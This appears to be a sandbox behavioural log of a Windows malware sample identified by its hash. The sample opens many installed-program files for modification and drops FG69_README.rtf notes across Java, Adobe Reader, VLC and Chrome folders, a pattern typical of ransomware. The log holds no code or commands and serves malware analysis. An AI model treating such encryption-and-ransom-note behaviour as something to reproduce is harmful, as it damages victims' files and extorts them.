d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Atikokan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh87 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Curacao d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Warsaw d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\access-bridge-64.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\net.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mazatlan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuching d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Samarkand d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dhaka d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\ZoneInfoMappings d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Warsaw d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Kerguelen d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\policytool.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\art\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\config.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-ui.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.oracle.jmc.executable.win32.win32.x86_64_5.5.0 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\meta-index d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tarawa d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\ant-javafx.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Fortaleza d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pl.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Singapore d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-12 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kiev d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\cacerts d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tripoli d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\RepairRemove.fon d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_HK.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\CodeFile.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Bucharest d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javadoc.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\SuspendRename.htm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\currency.data d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hi.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Edmonton d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Belgrade d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Metlakatla d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\logging.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Niue d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.SF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql2000.xsl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\core.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoCanary.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Shanghai d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kiritimati d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-search.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.httpcomponents.httpclient_4.2.6.v201311072007.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\javaws.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+9 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javah.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\lt.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Stockholm 